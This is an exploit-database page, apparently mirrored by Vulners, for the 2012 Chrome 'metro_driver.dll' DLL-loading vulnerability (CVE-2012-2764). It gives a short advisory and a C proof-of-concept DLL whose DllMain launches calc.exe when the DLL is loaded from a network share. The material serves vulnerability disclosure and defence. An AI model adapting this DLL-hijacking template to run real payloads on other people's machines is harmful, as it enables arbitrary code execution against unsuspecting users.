Lucene search
+L

Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution

🗓️ 26 Jun 2012 00:00:00Reported by Moshe ZioniType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Google Chrome 19.0.1084.52 vulnerability allows arbitrary code execution via 'metro_driver.dll' DLL loading from network share

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Google Chrome < 20.0.1132.43 Multiple Vulnerabilities
5 Jul 201200:00
nessus
Tenable Nessus
Google Chrome < 20.0.1132.43 Multiple Vulnerabilities
27 Jun 201200:00
nessus
Circl
CVE-2012-2764
26 Jun 201200:00
circl
CVE
CVE-2012-2764
27 Jun 201210:00
cve
Cvelist
CVE-2012-2764
27 Jun 201210:00
cvelist
Debian CVE
CVE-2012-2764
27 Jun 201210:00
debiancve
EUVD
EUVD-2012-2744
7 Oct 202500:30
euvd
Google Chrome Security Advisories
Stable Channel Update
26 Jun 201200:00
chrome
NVD
CVE-2012-2764
27 Jun 201210:18
nvd
OpenVAS
Google Chrome Multiple Vulnerabilities (Jul 2012) - Windows
4 Jul 201200:00
openvas
Rows per page
/*
source: https://www.securityfocus.com/bid/54477/info

Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.

Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.

Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it.
*/

#include <windows.h>
int hijack_poc ()
{
 WinExec ( "calc.exe" , SW_NORMAL );
 return 0 ;
}

BOOL WINAPI DllMain
    (    HINSTANCE hinstDLL ,
       DWORD dwReason ,
       LPVOID lpvReserved )
{
 hijack_poc () ;
 return 0 ;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2017 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.2
EPSS0.00446
24